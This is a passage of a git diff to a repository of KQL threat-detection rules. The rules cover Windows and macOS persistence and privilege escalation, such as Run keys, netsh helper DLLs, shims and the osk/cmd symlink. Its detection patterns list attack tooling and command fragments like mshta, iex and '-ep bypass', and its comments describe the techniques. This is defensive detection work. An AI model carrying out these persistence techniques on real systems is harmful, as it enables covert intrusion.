sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries +// Author: Bhabesh Raj +// Date: 2022-08-01 +// Level: high +// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql index a138f10c..247d9a52 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Attempt Via Existing Service Tampering -// Author: Sreeman -// Date: 2020-09-29 -// Level: medium -// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011 - -DeviceProcessEvents +// Title: Potential Persistence Attempt Via Existing Service Tampering +// Author: Sreeman +// Date: 2020-09-29 +// Level: medium +// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011 + +DeviceProcessEvents | where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql index e89c136c..81b5797b 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql @@ -1,14 +1,14 @@ -// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE -// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2021-06-28 -// Level: medium -// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. -// - Legitimate administrator sets up autorun keys for legitimate reasons. -// - Discord - -DeviceProcessEvents +// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2021-06-28 +// Level: medium +// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. +// - Legitimate administrator sets up autorun keys for legitimate reasons. +// - Discord + +DeviceProcessEvents | where (ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql index 10361e4b..db9f023f 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Using DebugPath -// Author: frack113 -// Date: 2022-07-27 -// Level: medium -// Description: Detects potential persistence using Appx DebugPath -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 - -DeviceRegistryEvents +// Title: Potential Persistence Using DebugPath +// Author: frack113 +// Date: 2022-07-27 +// Level: medium +// Description: Detects potential persistence using Appx DebugPath +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 + +DeviceRegistryEvents | where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql index be2ef769..f8a9409c 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql @@ -1,15 +1,15 @@ -// Title: Potential Persistence Via App Paths Default Property -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-10 -// Level: high -// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence -// The entries found under App Paths are used primarily for the following purposes. -// First, to map an application's executable file name to that file's fully qualified path. -// Second, to prepend information to the PATH environment variable on a per-application, per-process basis. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012 -// False Positives: -// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) - -DeviceRegistryEvents +// Title: Potential Persistence Via App Paths Default Property +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence +// The entries found under App Paths are used primarily for the following purposes. +// First, to map an application's executable file name to that file's fully qualified path. +// Second, to prepend information to the PATH environment variable on a per-application, per-process basis. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012 +// False Positives: +// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it) + +DeviceRegistryEvents | where (RegistryValueData contains "\\Users\\Public" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "\\Desktop\\" or RegistryValueData contains "\\Downloads\\" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-" or RegistryValueData contains "rundll32" or RegistryValueData contains "regsvr32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains ".bat" or RegistryValueData contains ".hta" or RegistryValueData contains ".dll" or RegistryValueData contains ".ps1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths" and (RegistryKey endswith "(Default)" or RegistryKey endswith "Path") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql index 4eaac851..6a009776 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql @@ -1,14 +1,14 @@ -// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-01-01 -// Level: medium -// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. -// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. -// This can be potentially abused as a persistence mechanism. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 -// False Positives: -// - Legitimate applications making use of this feature for compatibility reasons - -DeviceRegistryEvents +// Title: Potential Persistence Via AppCompat RegisterAppRestart Layer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-01-01 +// Level: medium +// Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. +// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. +// This can be potentially abused as a persistence mechanism. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 +// False Positives: +// - Legitimate applications making use of this feature for compatibility reasons + +DeviceRegistryEvents | where RegistryValueData contains "REGISTERAPPRESTART" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers*" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql index 63c6d8a9..eda54125 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via GlobalFlags -// Author: Karneades, Jonhnathan Ribeiro, Florian Roth -// Date: 2018-04-11 -// Level: high -// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002 - -DeviceRegistryEvents +// Title: Potential Persistence Via GlobalFlags +// Author: Karneades, Jonhnathan Ribeiro, Florian Roth +// Date: 2018-04-11 +// Level: high +// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1546.012, car.2013-01-002 + +DeviceRegistryEvents | where (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\Image File Execution Options*" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\SilentProcessExit*")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql index c278167e..71bd8e83 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Logon Scripts - CommandLine -// Author: Tom Ueltschi (@c_APT_ure) -// Date: 2019-01-12 -// Level: high -// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001 -// False Positives: -// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools - -DeviceProcessEvents +// Title: Potential Persistence Via Logon Scripts - CommandLine +// Author: Tom Ueltschi (@c_APT_ure) +// Date: 2019-01-12 +// Level: high +// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001 +// False Positives: +// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools + +DeviceProcessEvents | where ProcessCommandLine contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql index 8f7b1c8c..4c95740d 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Logon Scripts - Registry -// Author: Tom Ueltschi (@c_APT_ure) -// Date: 2019-01-12 -// Level: medium -// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement -// False Positives: -// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate - -DeviceRegistryEvents +// Title: Potential Persistence Via Logon Scripts - Registry +// Author: Tom Ueltschi (@c_APT_ure) +// Date: 2019-01-12 +// Level: medium +// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement +// False Positives: +// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate + +DeviceRegistryEvents | where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql index ae1e326d..9f3c9138 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql @@ -1,11 +1,11 @@ -// Title: Potential Persistence Via Microsoft Compatibility Appraiser -// Author: Sreeman -// Date: 2020-09-29 -// Level: medium -// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. -// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 - -DeviceProcessEvents +// Title: Potential Persistence Via Microsoft Compatibility Appraiser +// Author: Sreeman +// Date: 2020-09-29 +// Level: medium +// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. +// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 + +DeviceProcessEvents | where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql index 6b86162a..90311d71 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via Netsh Helper DLL -// Author: Victor Sergeev, oscd.community -// Date: 2019-10-25 -// Level: medium -// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108 - -DeviceProcessEvents +// Title: Potential Persistence Via Netsh Helper DLL +// Author: Victor Sergeev, oscd.community +// Date: 2019-10-25 +// Level: medium +// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108 + +DeviceProcessEvents | where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql index 41364086..5dd8c87f 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Netsh Helper DLL - Registry -// Author: Anish Bogati -// Date: 2023-11-28 -// Level: medium -// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 -// False Positives: -// - Legitimate helper added by different programs and the OS - -DeviceRegistryEvents +// Title: Potential Persistence Via Netsh Helper DLL - Registry +// Author: Anish Bogati +// Date: 2023-11-28 +// Level: medium +// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 +// False Positives: +// - Legitimate helper added by different programs and the OS + +DeviceRegistryEvents | where (RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh") and (not(((RegistryValueData in~ ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql index dae58d0d..f38cc1af 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-04-05 -// Level: high -// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 - -DeviceRegistryEvents +// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-04-05 +// Level: high +// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 + +DeviceRegistryEvents | where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql index af65414b..d1ccd685 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via PlistBuddy -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-02-18 -// Level: high -// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004 - -DeviceProcessEvents +// Title: Potential Persistence Via PlistBuddy +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: high +// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "LaunchAgents" or ProcessCommandLine contains "LaunchDaemons") and (ProcessCommandLine contains "RunAtLoad" and ProcessCommandLine contains "true") and FolderPath endswith "/PlistBuddy" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql index 6c70f9b8..2906d3aa 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via Powershell Search Order Hijacking - Task -// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022-04-08 -// Level: high -// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 - -DeviceProcessEvents +// Title: Potential Persistence Via Powershell Search Order Hijacking - Task +// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-04-08 +// Level: high +// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql index 202552f7..2eba3e8e 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql @@ -1,12 +1,12 @@ -// Title: Potential Persistence Via Scrobj.dll COM Hijacking -// Author: frack113 -// Date: 2022-08-20 -// Level: medium -// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 -// False Positives: -// - Legitimate use of the dll. - -DeviceRegistryEvents +// Title: Potential Persistence Via Scrobj.dll COM Hijacking +// Author: frack113 +// Date: 2022-08-20 +// Level: medium +// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use of the dll. + +DeviceRegistryEvents | where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql index e2da4396..974e2b41 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql @@ -1,10 +1,10 @@ -// Title: Potential Persistence Via Shim Database In Uncommon Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-01 -// Level: high -// Description: Detects the installation of a new shim database where the file is located in a non-default location -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 - -DeviceRegistryEvents +// Title: Potential Persistence Via Shim Database In Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: high +// Description: Detects the installation of a new shim database where the file is located in a non-default location +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 + +DeviceRegistryEvents | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql index 0f6cc0ae..b7942226 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql @@ -1,13 +1,13 @@ -// Title: Potential Persistence Via Shim Database Modification -// Author: frack113 -// Date: 2021-12-30 -// Level: medium -// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 -// False Positives: -// - Legitimate custom SHIM installations will also trigger this rule - -DeviceRegistryEvents +// Title: Potential Persistence Via Shim Database Modification +// Author: frack113 +// Date: 2021-12-30 +// Level: medium +// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. +// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 +// False Positives: +// - Legitimate custom SHIM installations will also trigger this rule + +DeviceRegistryEvents | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*") and (not((RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData)))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql index 1ef1cf25..40e96c35 100644 --- a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql +++ b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql @@ -1,10 +1,10 @@ -// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd -// Author: frack113 -// Date: 2022-12-11 -// Level: high -// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008 - -DeviceProcessEvents +// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd +// Author: frack113 +// Date: 2022-12-11 +// Level: high +// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008 + +DeviceProcessEvents | where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql index 